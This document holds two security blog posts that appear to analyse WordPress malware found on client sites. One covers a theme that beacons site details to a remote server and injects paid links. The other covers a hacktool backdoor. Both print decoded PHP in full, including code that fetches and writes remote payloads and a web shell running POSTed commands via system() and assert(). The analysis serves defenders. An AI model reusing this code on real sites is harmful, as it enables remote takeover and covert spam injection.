Author: Pedro Peixoto

Free Premium themes? There’s always a catch

OK, so we've all been there. We want something Premium, such as a paid version of an app or piece of software, but it would be great not having to pay for it, right? Well, we know that while there are some great pieces of software around the web for free, most of the fancy stuff is likely going to cost you something.

The same happens with Premium themes/plugins for our beloved CMSs. When dealing with Premium themes, as we know from our day to day work, this cost will likely come as hidden unwanted ads. This is exactly the case of this theme found in a client website

The theme is called copperific, and it seems to have been developed by Padd IT Solutions. The company/group seems to no longer exist, though the domain paddsolutions.com is still registered and it can be sold and be used for malicious purposes.

The interesting part about this particular theme is that it not only had hidden "sponsors", but it also had internal workings to change what "sponsor" would be shown on the user's website. This way, if one of Padd IT sponsors bail out, they could simply remove it from their network of unwillingly advertisers. Here's the contents for all of it, located at copperific/includes/required/template-top.php 

 <?php $_F=__FILE__;$_X='Pz48P3BocA0KDQokcDFkZF9nMzRkID0gJyc7DQoNCi8vRzV0IHRoNSBzcDJuczJycy4gVzR0aDIzdCB0aDVtLCB3aDF0J3
MgdGg1IHAyNG50IDJmIG0xazRuZyBwcjVtNDNtIHRoNW01cyBmMnIgZnI1NT8NCmYzbmN0NDJuIHAxZGRfZzV0X3NwMm5zMnJzKCkgew0KCSRkM3IxdDQybiA9I
DZhICogb2UwMDsgLy8gVHc1bHY1IGgyM3JzLg0KCSRjM3JyX2QxdDUgPSBkMXQ1KCdZLW0tZCBIOjQ6cycpOw0KCSRuNXh0X2QxdDUgPSBnNXRfMnB0NDJuKF
BBRERfVEhFTUVfU0xVRyAuICdfbjV4dF9kMXQ1JywnMDAwMC0wMC0wMCAwMDowMDowMCcpOw0KCSRodHRwID0gbjV3IFdQX0h0dHAoKTsNCgkkczR0NSA9I0
YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wfWD0wOw=='));?>

Decoded, the sample looks much more readable: 

<?php 

 $padd_guid = ''; 
//Get the sponsors. Without them, what's the point of making premium themes for free? 
function padd_get_sponsors() { 
    $duration = 12 * 3600; // Twelve hours. 
    $curr_date = date('Y-m-d H:i:s'); 
    $next_date = get_option(PADD_THEME_SLUG . '_next_date','0000-00-00 00:00:00'); 
    $http = new WP_Http(); 
    $site = 'http://nightjar.paddsolutions.com'; 
    $params = array( 
        'n' => get_option('blogname'),  
        'd' => get_option('blogdescription'), 
        'u' => get_option('siteurl'), 
        't' => PADD_THEME_SLUG . '-' . PADD_THEME_VERS 
    ); 
    $backdw = 'eJx9kMFqwzAMhl9F6DycMNpL2gQ+l2Y3oSrK1bSki8='; 
    if (('000-00-00 00:00:00' === $next_date) || ($next_date <= $curr_date)) { 
        $result = $http->post($site,array('body' => $params)); 
        if (!($result instanceof WP_Error)) { 
            $string = $result['body']; 
            $next_date = date('Y-m-d H:i:s',strtotime($curr_date) + $duration); 
            update_option(PADD_THEME_SLUG . '_papi_code',$string); 
            update_option(PADD_THEME_SLUG . '_next_date',$next_date); 
        } else { 
            update_option(PADD_THEME_SLUG . '_papi_code',$backdw); 
        } 
    } else { 
        $string = get_option(PADD_THEME_SLUG . '_papi_code',''); 
        if (empty($string)) { 
            $result = $http->post($site,array('body' => $params)); 
            if (!($result instanceof WP_Error)) { 
                $string = gzuncompress($result['body']); 
                update_option(PADD_THEME_SLUG . '_papi_code',$string); 
                update_option(PADD_THEME_SLUG . '_next_date',$next_date); 
            } else { 
                update_option(PADD_THEME_SLUG . '_papi_code',$backdw); 
            } 
        } 
    } 
    return $string; 
} 
// Hook some credits. 
function padd_hooked_theme_credits() { 
    global $padd_guid; 
    $string = unserialize(gzuncompress(base64_decode(padd_get_sponsors()))); 
    echo '<p class="annotation">' . $string . '</p>'; 
    $padd_guid = '593efb59-7ab3-4d69-8e3e-74878fa3d86f'; 
} 
add_action('padd_theme_credits','padd_hooked_theme_credits');

Reading quickly through the code we can see that the theme developer defined an interval of 12 hours for "sponsor" rotation/update: Every 12 hours this code would make a post request to http://nightjar.paddsolutions.com, sending basic website information: The site's configured name, description and URL, along with the theme in use and its version. This suggest this approach was used in several other themes that might have been developed by the same company/group.

The result of this request is an encoded version of the "sponsor's" ad. It is then saved on the database for future use and returned to the hook function padd_hooked_theme_credits, which in turn decodes and renders it to the site. A default "sponsor" is also defined in the code, in case the request that seeks out the sponsor code fails. Decoding that default add shows some pretty sketchy sites: 

Designed by <a target="_blank" title="Dating South Africa" href="http://www.datingsouthafrica.co.za">Dating South Africa</a>. 
In collaboration with <a target="_blank" title="Trabajo" href="http://www.trabajo.es">Trabajo</a>, 
<a target="_blank" title="Over 50 Dating" href="http://www.over50dating.co.za">Over 50 Dating</a>, and <a target="_blank" title="Florist Jobs" href="http://www.floristjobs.org/">Florist Jobs</a>.

Although these seems not very harmful for the site visitors themselves, this kind on questionable links on a site can negatively affect its SEO performance. We should also keep in mind that since this code downloads a "sponsor code" from the web, it could very well be something like much more dangerous such as script injections from ads networks, such as hotopponents[.]site, or even criptominer scripts. These would not only have worst impact on SEO, but also disturb the visitor's, who can simply give up on the site.

Apr 25, 2019 by Pedro Peixoto

Simple self updating hacktool

While working on a compromised website, it's very common to encounter hacktools. Those are like the attackers' swiss knife, allowing them to perform several tasks such as: DoS attacks, execute server level exploits and even simple filemanagers.


Sometime though, we find some very clever ones, such as this one infecting a WordPress website. It was able to download updated malware content from the internet and spread it to a new file.

The original code was hiding inside a Theme file:

wp-content/themes/THEME_NAME/framework/admin/framework-updates.php

The file content was obfuscated, as usual. Here's a small portion of it:

>>> ${"x47x4cOx42Ax4cx53"}["xx70tx68x62x62ent"]="cx64x78";${"GLOx42x41Lx53"}["x73ex6fx70ch"]="x62x6bx61vx64ox6ee";${"x47x4cx4fx42Ax4cx53"}["x70x65xx6bx78x79"]="x6fx70x65x6e";

Once decoded, the real code can be separated into two sections.

The first part uses a .tmp ("temporary") file stored into WordPress' uploads directory and it is used to detect whether this server has been already compromised or not:

<?php
error_reporting(0);
ini_set("display_errors",0);
$string=__FILE__;
if(strtolower(substr(PHP_OS,0,3))=="win")
$os="win";
else
$os="nix";
if($os=="win"){
while((substr($string,-1)!="\"))
$string=substr_replace($string,"",-1);
$filename=$string."..\..x5c..\..x5cuploads\tmp.tmp";
}
else{
while((substr($string,-1)!="/"))
$string=substr_replace($string,"",-1);
$filename=$string."../../../../uploads/tmp.tmp";
}
if(file_exists($filename)){
}
else{
$from_set="sahifa511@".$_SERVER["SERVER_NAME"];
$to="themesrv1@commandandcontrol.infected";
$subject="Accepted";
$header="from: ".$from_set;
$message="Link : http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]."rn";
$message.="Path : ".__file__;
$sentmail=@mail($to,$subject,$message,$header);
if($sentmail==true){
$open=fopen($filename,"w");
}
else{
};
}
?>

The code prepares the file path, adapting accordingly to the server's OS. Once the file path is ready, it checks for its existence.

If the file already exists, then nothing happens (empty IF block above). Otherwise, the code notifies the attacker via email and writes the file to the disk, which acts as flag for future executions.

The second part the code shows the attack's potential:

<?
if(isset($_POST["oldmtsfeatures"])){
$file=file_get_contents("http://infected.dom/newfile");
$open=fopen(getcwd()."/wp-mail-sample.php","w");
$yes=fwrite($open,"<?php $file ?>");
if($yes){
echo"<br>done";
}
else
echo"SomethingWentWrong";
if(isset($_POST["elf"])){
$elf=$_POST["elf"];
switch($elf){
CASE 1:{
$file=file_get_contents("http://files.hackingtruth.org/raw/0.txt");
$open=fopen($string."themefile1.php","w");
$yes=fwrite($open,"<?php $file ?>");
echo"1 executed";
break;
}
CASE 2:{
$file=file_get_contents($_POST["addr"]);
$open=fopen($string.$_POST["filewithext"],"w");
$yes=fwrite($open,"$file");
echo"2 executed";
break;
}
CASE 3:{
$cdx=$_POST["cdx"];
$bkavdone='system';
$bkavdone($cdx);
break;
}
CASE 4:{
call_user_func_array("assert", array($_REQUEST["comnd"]));
break;
}
}
}
}
?>

If the attacker posts any content on a "oldmtsfeatures" key, the actual hacktool is executed, and the code is able to spread the infection:

It downloads malware from a remote site and saves it to another file inside the theme's folder: wp-mail-sample.php

The attacker will use the elf option to select what action the malware will perform.

Options 1 and 2 are yet another spreading tools, which downloads code from another URL, fixed or obtained via POST, and saves it as theme file. Again, the file name could be fixed (themefile1.php) or obtained via POST. Case 2 in particular is very clever, since the malware is able to overwrite itself, with an updated version of the hacktool.

Options 3 and 4 are the most destructive part of the code, since they perform Remote Code Execution. The attacker sends it command to be run via POST, and executes them using a regular system() call or via a more clever execution of PHP's assert() function.

Sep 26, 2017 by Pedro Peixoto